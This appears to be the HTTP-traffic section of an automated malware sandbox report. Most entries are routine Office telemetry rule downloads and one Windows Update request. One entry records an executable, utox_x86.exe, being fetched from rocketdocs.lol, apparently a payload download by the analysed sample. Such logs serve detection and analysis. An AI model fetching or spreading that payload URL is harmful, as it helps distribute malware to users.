Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /utox_x86.exe HTTP/1.1Host: rocketdocs.lolConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UU6vZgkzccoB6vM&MD=LgcgFu8w HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
